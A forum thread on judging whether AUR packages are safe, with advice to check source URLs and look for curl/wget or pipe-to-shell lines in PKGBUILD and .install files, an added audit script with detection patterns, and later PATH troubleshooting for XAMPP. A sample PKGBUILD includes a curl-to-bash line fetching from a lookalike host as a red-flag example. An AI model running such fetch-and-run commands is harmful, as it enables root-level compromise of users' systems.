Installing AUR Apps

Hello,
I'm actually running Manjaro KDE and trying to install XAMPP for Linux. The problem is that I find it only on the AUR, and I don't really know if I can trust the package on the AUR (as it says that it's potentially dangerous).
I try as much as possible to download and install the apps I need from their official sources, but sometimes I have to go and get them from the AUR.
So how can I tell if the package's source can be trusted and there's no risk in using it?

The warning of being potentially dangerous is not for specific packages, but for AUR in general.

AUR packages are user-generated content and as such could, in theory, contain malicious commands that could wreck your system.

But since all the build files are openly available on the internet, it's quick to look up the PKGBUILD and see what it does.
If you feel comfortable with it, you can install it.

3 Likes

Thanks for the answer. The problem is that I'm quite new to the "package managing" thing and I don't really know how to identify whether a package is malicious or not.
I just read the PKGBUILD source code and couldn't really understand much of it.
Is there any tutorial you can recommend that I read so that I can get a grasp of what it does?

The chance of an AUR package causing security problems etc. is less than you dropping dead in the next 5 seconds.
There has been just one case of malware in all the years of the AUR, and it was found within 4 hours of being released. It would not even compile, so not much chance really.

2 Likes

PKGBUILDs are not "source code." They are simple scripts written in very plain English. Don't make things harder for yourself than they really are. Stay awhile, read and learn, and you'll be just fine. :smiley:

regards

4 Likes

PKGBUILD is written in bash. So an understanding of bash would certainly be useful.

For more specific info about PKGBUILD and the Arch packaging format (which is the one used in Manjaro), I would invite you to read at least these pages.

https://wiki.archlinux.org/index.php/PKGBUILD
https://jlk.fjfi.cvut.cz/arch/manpages/man/PKGBUILD.5

But even if you do not fully understand PKGBUILD, I will give you two things you can check pretty easily that can alert you to a potential threat:

  • Verify what files are downloaded in order to build the package. You can see that in sources=. For example, if you want to install TeamViewer, but you see that it is taking files from https://someweirdunreatedsite.com, or maybe something more subtle like https://team-viewer.com, well, that looks suspicious.

  • If you see some wget or curl command either in the PKGBUILD or in the .install file (a script that will be executed before/after the package gets installed/removed/upgraded; not every package will have one), it might hide something shady. Those commands are used to download file(s), and could be used to download malicious file(s) that the attacker doesn't want you to see easily. Those commands would be run either while building the package (if it is in the PKGBUILD) or when installing/removing/upgrading the package (if it is in the .install file). If you have something like curl <URL> | bash, then it is even more suspicious, since the requested file is a script that will be executed right after being downloaded from whatever source is mentioned. Note that commands in the .install file are run as root (UID 0) and therefore with the highest level of privileges possible; so if there are malicious commands in the .install (like retrieving a malicious script from the internet and executing it), they are going to be run with the highest level of privileges on your system.

If other people have additional easy tips that can be verified without deep knowledge of bash scripting, feel free to suggest them.

2 Likes
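As an added example (not code from the thread or from the AUR), here is a small POSIX shell audit that mechanises the two checks in the post above: it compares the host of every URL in a PKGBUILD against the project's real domain, and flags curl/wget lines and pipe-to-shell constructs. The sample PKGBUILD and the "real" host example.org are constructed; in practice you would run audit_pkgbuild on the PKGBUILD and any .install file you fetched from the AUR, with the domain you looked up on the project's own site.

```shell
#!/bin/sh
# Constructed sample PKGBUILD (not a real AUR package). It shows both red flags
# from the post: a second download host that imitates the project name, and a
# curl ... | bash line inside build().
SAMPLE_PKGBUILD='pkgname=example-app
pkgver=1.0
source=("https://example.org/releases/example-app-1.0.tar.gz"
        "https://example-app.com/helper.sh")
build() {
  cd "$srcdir"
  curl -s https://example-app.com/setup.sh | bash
  make
}'
sample=$(mktemp)
printf '%s\n' "$SAMPLE_PKGBUILD" > "$sample"

FETCH_RE='(^|[^a-zA-Z_])(curl|wget)([^a-zA-Z_]|$)'
PIPE_SH_RE='\|[[:space:]]*(ba)?sh([[:space:]]|$)'

# audit_pkgbuild FILE EXPECTED_HOST
# Prints one line per finding and returns the number of findings (0 = clean).
# EXPECTED_HOST is the project's real domain, which you look up yourself.
audit_pkgbuild() {
  file=$1; expected=$2; findings=0
  # 1. every URL whose host is not the expected domain (or a subdomain of it)
  for url in $(grep -oE 'https?://[^" )]+' "$file" || true); do
    host=${url#*://}; host=${host%%/*}
    case "$host" in
      "$expected"|*."$expected") ;;
      *) echo "unexpected download host: $host  ($url)"; findings=$((findings+1)) ;;
    esac
  done
  # 2. curl/wget anywhere in the file: downloads that are not listed in source=
  fetches=$(grep -nE "$FETCH_RE" "$file" || true)
  if [ -n "$fetches" ]; then
    printf '%s\n' "$fetches" | sed 's/^/network fetch in script: line /'
    findings=$((findings + $(printf '%s\n' "$fetches" | wc -l)))
  fi
  # 3. pipe-to-shell: a downloaded file executed without ever being inspected
  n=$(grep -cE "$PIPE_SH_RE" "$file" || true)
  [ "$n" -gt 0 ] && echo "pipe-to-shell construct on $n line(s)"
  findings=$((findings + n))
  return "$findings"
}

# Stand-alone run against the sample; the project's real host is assumed to be example.org
audit_pkgbuild "$sample" example.org || echo "findings: $?"
```

A non-zero count is a reason to read those lines by hand, not proof of malice: legitimate PKGBUILDs do sometimes fetch from mirrors or CDNs on other domains.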

The xampp package in AUR seems to be quite a bit out of date and according to the comments there, it doesn't work.

Is there a real need to use that package? Couldn't you install the components individually?

Alternatively, if you want a plug & play solution it seems like it would be the ideal candidate for running in a container like docker & friends.

The xampp package doesn't work, so I had to install it manually and get it to work. The only problem I'm facing right now is setting the PHP global variable (the php binary is in /opt/lampp/bin/php and I could execute the php -v command to verify it works).

I used the set php=/opt/lampp/bin/php command to set it as a global variable and logged out/in, but the php command isn't recognized. If someone can give me a quick solution for this one so that I don't have to open a new topic about it, that would be nice.

If you want that variable to be set in your environment all the time, try adding this line to the file /etc/environment:

php=/opt/lampp/bin/php

I already tried that and restarted my computer, but I'm still getting this error:

php -v
bash: php: command not found

Here's the content of the /etc/environment file:

#
# This file is parsed by pam_env module
#
# Syntax: simple "KEY=VAL" pairs on separate lines
#

php=/opt/lampp/bin/php

That is due to your PATH not having that directory in it. I am not sure that it is really a problem for php, but if you need/want it in your PATH you can add it.

Try putting this in your ~/.bashrc file:

export PATH=$PATH:/opt/lampp/bin

1 Like

That line did the trick. I added it to the end of the .bashrc file and now php is recognized as a command.

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.